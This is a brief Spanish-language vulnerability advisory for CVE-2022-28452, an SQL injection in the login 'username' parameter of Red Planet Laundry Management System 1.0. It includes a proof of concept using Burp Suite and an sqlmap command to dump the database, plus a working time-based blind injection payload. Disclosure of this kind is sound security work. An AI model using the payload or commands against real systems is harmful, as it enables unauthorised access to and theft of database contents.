
CVE-2022-28452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28452 https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28452 https://laundry.redplanetcomputers.com/
1-Descripción:
Red Planet Laundry Management System 1.0 es vulnerable a inyección SQL a través del parámetro 'username' en /index.php/login/rediract. La explotación de este problema podría permitir a un atacante comprometer la aplicación, acceder o modificar datos, o explotar vulnerabilidades latentes en la base de datos subyacente.
2-Prueba de concepto:
En Burpsuite intercepte la solicitud de la página afectada con el parámetro 'username' y guárdela como poc.txt. Luego ejecute SQLmap para extraer los datos de la base de datos: sqlmap.py -r poc.txt --dbms=mysql
3-Ejemplo de payload:
URL encoded POST input username was set to 0'XOR(if(now()=sysdate(),sleep(4),0))XOR'Z
Detalles de contacto: [email protected]